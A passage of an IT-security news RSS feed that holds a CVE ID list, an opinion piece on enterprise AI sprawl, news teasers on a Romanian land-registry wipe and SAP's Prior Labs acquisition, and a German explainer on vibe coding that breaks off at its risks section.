CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320)]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s problems aren’t what you think]]></title>
<description><![CDATA[The biggest and loudest prediction about AI is that it will eliminate millions of jobs. It is dramatic and easy to repeat. But from what I’ve seen, inside most enterprises the more immediate problem has turned out to be something else entirely: a growing mass of tools, agents, models and usage co...]]></description>
<link>https://tsecurity.de/de/3681198/it-security-nachrichten/ais-problems-arent-what-you-think/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681198/it-security-nachrichten/ais-problems-arent-what-you-think/</guid>
<pubDate>Mon, 20 Jul 2026 15:08:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The biggest and loudest prediction about AI is that it will <a href="https://www.axios.com/2025/05/28/ai-jobs-white-collar-unemployment-anthropic">eliminate</a> millions of jobs. It is dramatic and easy to repeat. But from what I’ve seen, inside most enterprises the more immediate problem has turned out to be something else entirely: a growing mass of tools, agents, models and usage costs spreading faster than most organizations can govern or connect to real business value, also known as <a href="https://www.ibm.com/think/topics/ai-agent-sprawl">AI sprawl.</a></p>



<p class="wp-block-paragraph">None of that invalidates the initial fear. Indeed, AI can clear backlogs, speed up analysis, draft usable content and reduce time spent on repetitive work. In my opinion, what goes wrong is the assumption that those gains will scale seamlessly, and that more AI will automatically produce more value.</p>



<p class="wp-block-paragraph">What really matters is not only how much AI a company can deploy, but whether its use fits inside a growth strategy, an operating model and an organization that can use it well.</p>



<p class="wp-block-paragraph">The early results of AI use made the logical progression feel obvious, even a foregone conclusion. If it could already improve output in narrow use cases, then broader deployment should produce broader gains. Simple! Better models were expected to deliver better results. More agents were expected to drive more automation. For many companies, this logic held for long enough to encourage overexpansion.</p>



<p class="wp-block-paragraph">But this logic has started to break down as usage continues to scale. I’ve seen returns diminish much quicker than expected. To illustrate, one <a href="https://www.businessinsider.com/ai-tokenmaxxing-fails-as-productivity-strategy-jellyfish-2026-5?utm">industry analysis</a> found that developers who used AI most heavily produced about twice the output of moderate users, but consumed roughly ten times the compute.  </p>



<p class="wp-block-paragraph">At a certain point, more AI does not create proportionally more value – it simply becomes more expensive. But where, exactly?</p>



<h2 class="wp-block-heading">From experimentation to sprawl</h2>



<p class="wp-block-paragraph">Experimentation played a key role in this downturn, but it’s not the culprit. As AI continues to sprawl, the problem continues that AI is spreading faster than most companies can coordinate. Teams often solve the same problem in parallel, paying for overlapping capabilities and layering new tools atop existing ones without any clear inventory of what ‘s already in place. What can appear as momentum is really turning into redundancy.</p>



<p class="wp-block-paragraph">I’ve seen versions of this play out repeatedly. At one financial firm, several business units were pursuing AI projects aimed at automating research and reporting. Each team moved independently; selecting their own tools, building their own workflows and creating separate data pipelines, with little to no coordination between teams. In some cases, different groups were developing nearly identical capabilities without realizing it, solving the same problems twice without any shared visibility into each other’s work.</p>



<p class="wp-block-paragraph">Individually, the projects showed real promise. Collectively, the projects created duplication, fragmented data and inconsistent standards business and enterprise wide.</p>



<p class="wp-block-paragraph">By the time leadership stepped back to assess, the company found itself paying for overlapping capabilities, maintaining multiple versions of the same underlying data, and struggling to determine which solutions were actually delivering value versus which were simply consuming budget and eating at engineering time.</p>



<p class="wp-block-paragraph">Perhaps most troubling: nobody at the enterprise level had a complete view of what was being built, by whom or why. What began as healthy, well-intentioned experimentation had, without anyone deciding it should, evolved into full-blown AI sprawl, creating a patchwork of disconnected initiatives that was difficult to govern, harder to secure and far more expensive than a coordinated approach could and should be.</p>



<p class="wp-block-paragraph">Early wins encourage a still wider rollout, but many organizations expand usage before they put real controls in place. Experimentation becomes sprawl. Budgets grow quickly, and few leaders have a reliable view of who is using what or why.</p>



<h2 class="wp-block-heading">AI strategy cannot sit beside growth strategy</h2>



<p class="wp-block-paragraph">This is where I see many companies still get the issue wrong. They treat AI and growth strategy as two separate efforts, then wonder how adoption gets so messy. A business cannot drop AI into its operations and expect momentum to take over. The technology has to support a clear path to growth, whether that means improving margin, speed, service, capacity or decision-making. At the same time, growth plans cannot assume AI changes nothing about delivery, design or operating leverage. The real challenge is in ensuring the two work together.</p>



<p class="wp-block-paragraph">Personally, I’ve seen better results when AI initiatives are tied to a specific business objective from the beginning, rather than launched as broad, abstract or transformative effort. One mattress retailer I’ve worked with took this approach, starting with a single, focused and well-defined use case rather than trying to transform or overhaul the entire organization at once. The company introduced an AI-powered training platform for store associates, giving employees a low-pressure way to practice sales conversations and product recommendations before applying them to external situations with customers on the floor.</p>



<p class="wp-block-paragraph">Because employees experienced immediate and tangible value from the tool, adoption spread quickly across locations, with minimal need for top-down mandates. Early, visible success helped to build internal credibility and generate momentum, which leadership then leveraged to expand into more complex AI initiatives across areas such as inventory management, demand forecasting and replenishment planning.</p>



<p class="wp-block-paragraph">Ultimately, the technology succeeded not because it was innovative for its own sake, but because it was connected to a larger growth strategy: improving sales effectiveness on the floor, driving operational efficiency behind the scenes and strengthening workforce capability at entry level. A major lesson we walked away with here was that starting small and specific, with a clear throughline to business value creates a strong foundation for sustainable and scalable AI use.</p>



<h2 class="wp-block-heading">What implementation actually takes</h2>



<p class="wp-block-paragraph">All this takes more than a few easy guardrails. It takes strategy. Leaders need a real inventory of the tools, agents and assistants already in use across the business, who owns them, what data they can access and everything that they support.</p>



<p class="wp-block-paragraph">They also need financial controls that match the economics of token-based usage, including role-based access, thresholds and review processes that make spend visible before it becomes a surprise. Similarly, they need metrics that go beyond mere activity. More prompts do not mean more value. If a deployment cannot be tied to throughput, margin, quality, cycle time or another tangible result, it is still unfinished.</p>



<p class="wp-block-paragraph">This is also why blunt shutdowns rarely work. If leaders clamp down too hard, employees often move to unsanctioned tools and create a larger <a href="https://www.paloaltonetworks.com/cyberpedia/what-is-shadow-ai">shadow AI</a> problem, or the unauthorized use of artificial intelligence tools, models or chatbots by employees, without the knowledge or approval of IT and security teams, with even less visibility and more risk. The better answer is disciplined adoption: clear ownership, rules, metrics and enough flexibility for teams to use AI where it works.</p>



<p class="wp-block-paragraph">That matters for the people as much as it does for the budget. Those that modernize well end up with <em>better</em> work – not just less of it.</p>



<p class="wp-block-paragraph">The story of the moment isn’t about AI replacing people – or even AI in general. It’s about whether companies know their own businesses well enough to keep incorporating powerful new tools without mistaking activity for progress. As technological capabilities continue to appear, the winners will be the organizations that understand where it belongs, what it can improve and how to turn each new wave into something permanent.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt]]></title>
<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsn...]]></description>
<link>https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</guid>
<pubDate>Mon, 20 Jul 2026 12:54:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsnachweise und detaillierte Grundstücksdaten. Entscheidend ist, dass der Angriff nicht nur Systeme betraf, sondern offenbar […]</p>
<div><a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">... den vollständigen Artikel <strong>»Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP schließt Übernahme von Prior Labs ab]]></title>
<description><![CDATA[SAP hat die Übernahme des Freiburger Start-ups Prior Labs finalisiert. Der Deal soll SAPs KI-Strategie für Tabellendaten voranbringen, parallel zu weiteren Zukäufen im Datenbereich.

Tags: #Firmenübernahme | #SAP]]></description>
<link>https://tsecurity.de/de/3680381/it-security-nachrichten/sap-schliesst-uebernahme-von-prior-labs-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680381/it-security-nachrichten/sap-schliesst-uebernahme-von-prior-labs-ab/</guid>
<pubDate>Mon, 20 Jul 2026 08:23:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920.jpg" class="attachment-full size-full wp-post-image" alt="SAP" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/10/SAP-Quelle-Kittyfly-Shutterstock-2495597643-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="SAP schließt Übernahme von Prior Labs ab 5"></p>
    SAP hat die Übernahme des Freiburger Start-ups Prior Labs finalisiert. Der Deal soll SAPs KI-Strategie für Tabellendaten voranbringen, parallel zu weiteren Zukäufen im Datenbereich.

<p>Tags: <a href="https://www.it-daily.net/thema/firmenuebernahme">#Firmenübernahme</a> | <a href="https://www.it-daily.net/thema/sap-en">#SAP</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe Coding erklärt]]></title>
<description><![CDATA[Vibe Coding verspricht viele KI-getriebene Vorteile, macht Softwareentwickler jedoch nicht überflüssig – eher im Gegenteil.Fit Ztudio | shutterstock.com



Im Dev-Umfeld verschwimmt die Grenze zwischen Programmieren und Prompten schon seit einigen Jahren. Auf die Spitze getrieben wird diese Entwi...]]></description>
<link>https://tsecurity.de/de/3680298/it-security-nachrichten/vibe-coding-erklaert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680298/it-security-nachrichten/vibe-coding-erklaert/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Fit-Ztudio_shutterstock_2642655115_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Code Review Dev 16z9" class="wp-image-4086782" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Vibe Coding verspricht viele KI-getriebene Vorteile, macht Softwareentwickler jedoch nicht überflüssig – eher im Gegenteil.</figcaption></figure><p class="imageCredit">Fit Ztudio | shutterstock.com</p></div>



<p class="wp-block-paragraph">Im Dev-Umfeld verschwimmt die Grenze zwischen Programmieren und Prompten schon seit einigen Jahren. Auf die Spitze getrieben wird diese Entwicklung vom <a href="https://www.computerwoche.de/article/3854442/vibe-coding-im-selbstversuch.html" target="_blank">Vibe-Coding-Trend</a>: Frühe KI-Entwickler-Tools wie GitHub Copilot waren vornehmlich darauf ausgelegt, Devs zu unterstützen. Etwa, indem sie Funktionen und Syntax ergänzten oder Boilerplate-Code aus Kommentaren generierten. Kommt ein Vibe-Coding-Ansatz zum Zug, beginnen <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" target="_blank">menschliche Entwickler</a> hingegen gar nicht erst damit, Code zu schreiben.</p>



<p class="wp-block-paragraph">Dieses Konzept führt nicht nur zu veränderten Workflows, sondern erfordert auch, ein neues Mindset. Schließlich wird die Programmierarbeit mit <a href="https://www.computerwoche.de/article/4052859/github-spark-im-vibe-coding-test.html" target="_blank">Vibe Coding</a> eher zu einer Art Live-Prototyping. In diesem Artikel lesen Sie:</p>



<ul class="wp-block-list">
<li>warum Vibe Coding Vibe Coding heißt,</li>



<li>inwieweit sich dieser Ansatz für Unternehmen eignet,</li>



<li>wie Vibe-Coding-Workflows konkret aussehen (können),</li>



<li>welche Tools in diesem Bereich zu empfehlen sind,</li>



<li>welche Risiken Sie dabei auf dem Schirm haben sollten, sowie</li>



<li>Tipps dazu, wie Sie Vibe Coding effektiv in der Praxis umsetzen.</li>
</ul>



<h2 class="wp-block-heading">Vibe Coding – Begriffsdefinition</h2>



<p class="wp-block-paragraph">Der Begriff Vibe Coding wurde Anfang 2025 vom OpenAI-Mitbegründer <a href="https://www.linkedin.com/in/andrej-karpathy-9a650716/" target="_blank" rel="noreferrer noopener">Andrej Karpathy</a> geprägt. Der KI-Experte trat den Trend mit einem Post auf dem Kurznachrichtendienst X los.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">There's a new kind of coding I call "vibe coding", where you fully give in to the vibes, embrace exponentials, and forget that the code even exists. It's possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper…</p>— Andrej Karpathy (@karpathy) <a href="https://x.com/karpathy/status/1886192184808149383?ref_src=twsrc%5Etfw">February 2, 2025</a></blockquote>
</div></figure>



<p class="wp-block-paragraph">In diesem beschreibt Karpathy die Vibe-Coding-Methodik als eine neue Coding-Form, bei der man sich ganz den “Vibes” hingibt und vergisst, dass der Code überhaupt existiert. <a href="https://shadowdragon.io/author/amy-mshadowdragon-io/" target="_blank" rel="noreferrer noopener">Amy Mortlock</a>, Vice President of Marketing beim <a href="https://www.computerwoche.de/article/2795282/wie-viel-wissen-hacker-ueber-sie.html" target="_blank">OSINT</a>-Spezialisten ShadowDragon, erklärt das Konzept etwas weniger kryptisch: “Beim Vibe Coding beschreibt man in natürlicher Sprache, was man möchte, und die KI generiert dann die gesamte Anwendung und kümmert sich um alle technischen Details.”</p>



<p class="wp-block-paragraph">Vibe Coding setzt also darauf, die traditionelle Programmierarbeit durch dialogorientierte Anweisungen und <a href="https://www.computerwoche.de/article/4026379/ki-jobs-diese-skills-brauchen-entwickler.html" target="_blank">Kooperation mit einem KI-Assistenten</a> zu ersetzen. Statt detaillierte Spezifikationen zu entwerfen und diese an die Engineers weiterzugeben, können Produktmanager, Fachexperten – oder jeder andere, der eine Idee hat – in einfacher Sprache beschreiben, wie das Ergebnis aussehen soll. Die KI-Software erledigt dem Rest in Echtzeit. Allerdings geht es dabei weniger darum, die Softwareentwicklung durchgängig zu automatisieren.</p>



<p class="wp-block-paragraph">Vielmehr stehen Mindset-Veränderungen im Fokus: Warum sollte man nicht der KI die Mechanik überlassen und sich stattdessen auf die Ausrichtung, das Feedback, den Flow und die “Vibes” konzentrieren? Schließlich werden die Modelle, die Tools wie <a href="https://www.infoworld.com/article/4081431/cursor-2-0-adds-coding-model-ui-for-parallel-agents.html" target="_blank">Cursor</a> oder GitHub Copilot zugrunde liegen, immer performanter. Deswegen sehen auch viele Developer ihre Arbeit inzwischen vorwiegend als einen Dialog mit der KI – statt sich zeilenweise selbst durch Syntax zu wühlen.</p>



<p class="wp-block-paragraph">Und obwohl auch bei einem Vibe-Coding-Ansatz diverse <a href="https://www.computerwoche.de/article/4034385/9-wege-mit-vibe-coding-zu-scheitern.html" target="_blank">Probleme und Herausforderungen</a> auf den Plan treten können (dazu später mehr): Die Technik gewinnt zunehmend an Popularität – auch im Unternehmensumfeld.</p>



<h2 class="wp-block-heading">Vibe Coding im Unternehmen</h2>



<p class="wp-block-paragraph">Wie das in der Praxis konkret aussieht, beschreibt <a href="https://www.linkedin.com/in/charlesjiama/" target="_blank" rel="noreferrer noopener">Charles Ma</a>, Softwareentwickler beim Observability-Spezialisten Chronosphere: “Viele unserer Entwickler nutzen Tools wie Cursor und <a href="https://www.computerwoche.de/article/4182911/claude-code-hat-ein-sicherheitsproblem.html" target="_blank">Claude Code</a>. Wir fördern deren Einsatz sogar über ein Nutzungs-Leaderboard. Dabei betrachten wir die Tools jedoch als Assistenten, nicht als Dev-Ersatz. Unser Code-Review-Prozess ist weiterhin Pflicht für jeden Produktionscode – und wir sehen eher davon ab, viele unserer oder gar externe Tools mit KI zu verbinden.”</p>



<p class="wp-block-paragraph">In der Perspektive von <a href="https://www.linkedin.com/in/achint-agarwal-a853241" target="_blank" rel="noreferrer noopener">Achint Agarwal</a>, Vice President of Product beim KI-Anbieter Pramata, hat Vibe Coding vor allem die Art und Weise verändert, wie Teams vom Konzept zum Prototyp gelangen: “Früher mussten UI/UX-Designer und Entwickler zusammenarbeiten, um eine Idee in etwas zu verwandeln, mit dem Kunden interagieren konnten. Dieser Prozess konnte leicht mehrere Wochen dauern und diverse Überarbeitungsrunden umfassen.”</p>



<p class="wp-block-paragraph">Heute, so Agarwal, könne ein Produktmanager oder Fachexperte einfach in <a href="https://www.computerwoche.de/article/2799474/was-ist-natural-language-processing.html" target="_blank">natürlicher Sprache</a> formulieren, was er sich vorstellt, und die KI generiere funktionierenden Code in <a href="https://www.computerwoche.de/article/2785190/prototyping-hilft-bei-der-softwareentwicklung.html" target="_blank">Prototyp-Qualität</a>. “Bei dieser Veränderung geht es um mehr als nur Geschwindigkeit: Auch die Qualität der Ergebnisse ist besser, weil die Person, die den Anforderungen am nächsten steht, während des gesamten Prozesses die Kontrolle behält und es keine Reibungsverluste durch Übergaben gibt”, fügt der Manager hinzu.</p>



<p class="wp-block-paragraph">Auch Agarwal sieht in Vibe Coding kein Substitut für die traditionelle <a href="https://www.computerwoche.de/article/4016035/6-trends-wie-ki-die-softwareentwicklung-verandert.html" target="_blank">Softwareentwicklung</a>, sondern vor allem ein Explorations- und Validierungs-Tool: “Dev-Teams ist es damit möglich, in kurzer Zeit funktionierende Prototypen zu erstellen, diese mit Kunden zu testen und zu überprüfen, ob die Idee sinnvoll ist. Fällt diese Prüfung positiv aus, kann der Prototyp an die Engineers gehen, die ihn mit Blick auf Skalierbarkeit, Sicherheit und langfristige Integrationen weiter ausbauen.”</p>



<h2 class="wp-block-heading">Wie sieht ein Vibe-Coding-Workflow aus?</h2>



<p class="wp-block-paragraph">Es gibt keine allgemeingültige Blaupause für Vibe Coding. Entsprechend gehen auch die Ansichten darüber auseinander, wie ein typischer Vibe-Coding-Workflow aussieht. <a href="https://www.linkedin.com/in/kostaspardalis/" target="_blank" rel="noreferrer noopener">Kostas Pardalis</a>, Data Infrastructure Engineer beim KI-Lösungsanbieter Typedef, beschreibt diesen als agilen, vierstufigen Prozess:</p>



<ul class="wp-block-list">
<li>die <strong>Erkundungsphase</strong>, in der der “Vibe”, der Zweck und die Einschränkungen definiert werden.</li>



<li>die <strong>Gestaltungsphase</strong>, in der ein funktionierender Prototyp erstellt und verfeinert wird.</li>



<li>die <strong>Grounding-Phase</strong>, die genutzt wird, um Struktur und Datenintegrität hinzuzufügen.</li>



<li>die <strong>Operationalisierungsphase</strong>, in der Versionierung, Evaluierung und Governance hinzukommen.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/steve-croce-1060082/" target="_blank" rel="noreferrer noopener">Steve Croce</a>, Field CTO beim Open-Source-Unternehmen Anaconda, steht hingegen auf dem Standpunkt, dass der Vibe-Coding-Workflow davon abhängig ist, ob ein Prototyp, eine Zwischenlösung oder eine vollständige Produktionsapplikation entwickelt werden soll. Basierend darauf, orientiert sich der Vibe-Coding-Workflow in der Vision des Technologieentscheiders eher am traditionellen Software Development Lifecycle – fußt jedoch ebenfalls auf vier Stufen:</p>



<ul class="wp-block-list">
<li>In der Phase der <strong>Planungs- und Anforderungsanalyse</strong> könnten Produktmanager und UX-Teams demnach voll und ganz auf Vibe Coding setzen und so vor der formellen Entwicklung klickbare Prototypen und Machbarkeitstests erstellen.</li>



<li>Im Rahmen der<strong> Design-Phase </strong>kann KI laut Croce dabei unterstützen, Architekturen und <a href="https://www.computerwoche.de/a/4077044" target="_blank">Dokumentationen zu erstellen</a>. Der Manager weist allerdings darauf hin, dass es in dieser Phase auch hilfreich sein könne, erfahrene Engineers oder Architekten hinzuziehen, um die Einhaltung von Standards und die Reusability interner Systeme zu gewährleisten.</li>



<li>Als Kernbereich der Vibe-Coding-Experience sieht Croce die<strong> Implementierungs- und Testphase:</strong> Ein KI-Agent könne an dieser Stelle die gesamte Anwendung erstellen und darüber hinaus auch Repositories strukturieren und <a href="https://www.computerwoche.de/article/2804460/installationen-und-funktionstests-automatisieren.html" target="_blank">Tests durchführen</a>. Der Experte rät Unternehmens-Teams jedoch mit Blick auf die Testabdeckung und Konformitätsprüfungen auch in dieser Phase dazu, menschliche Profis hinzuzuziehen.</li>



<li>In der <strong>Bereitstellungs- und Wartungsphase </strong>könne KI laut dem CTO dazu genutzt werden, Apps bereitzustellen und zu warten. Dieser Part könne jedoch auch vollständig außerhalb der Vibe-Coding-Erfahrung abgewickelt werden, um den Unternehmensanforderungen zu entsprechen, so Croce.</li>
</ul>



<h2 class="wp-block-heading">Empfehlenswerte Vibe-Coding-Tools</h2>



<p class="wp-block-paragraph">Vibe-Coding-Tools decken ein breites Spektrum ab: Vom leicht zugänglichen, dialogorientierten Builder für nicht-technische Teams, bis hin zu integrierten Entwicklungsumgebungen (<a href="https://www.computerwoche.de/article/2827615/4-entwicklungsumgebungen-fuer-pythonistas.html" target="_blank">IDEs</a>), die Engineers umfassende Kontrollmöglichkeiten bieten und zuverlässige Anwendungen gewährleisten. Die Wahl des richtigen Tools hängt von den Fähigkeiten des Teams, dem Projektziel und dem benötigten Maß an Governance ab.</p>



<p class="wp-block-paragraph">Eine kleine Auswahl empfehlenswerter Tools für Vibe-Coding-Zwecke:</p>



<ul class="wp-block-list">
<li><a href="https://cursor.com/" target="_blank" rel="noreferrer noopener"><strong>Cursor</strong></a> ist eine KI-integrierte IDE, mit der sich mehrere Dateien bearbeiten lassen.</li>



<li><a href="https://replit.com/" target="_blank" rel="noreferrer noopener"><strong>Replit</strong></a> ist eine gute Wahl für Browser-basierte Entwicklungsarbeit.</li>



<li><a href="https://bolt.new/" target="_blank" rel="noreferrer noopener"><strong>Bolt</strong> </a>und <a href="https://lovable.dev/" target="_blank" rel="noreferrer noopener"><strong>Lovable</strong></a> sind Builder, eignen sich vor allem für schnelles Brainstorming und zeichnen sich durch überschaubaren technischen Aufwand aus. Diese Tools sind daher auch für Einsteiger geeignet.</li>



<li><a href="https://windsurf.com/" target="_blank" rel="noreferrer noopener"><strong>Windsurf</strong></a> und <a href="https://zed.dev/" target="_blank" rel="noreferrer noopener"><strong>Zed</strong></a> sind vollständige IDEs, die darauf ausgelegt sind, Vibe-Coding-Funktionen in traditionelle Dev-Umgebungen zu integrieren.</li>
</ul>



<h2 class="wp-block-heading">Diese Risiken birgt Vibe Coding</h2>



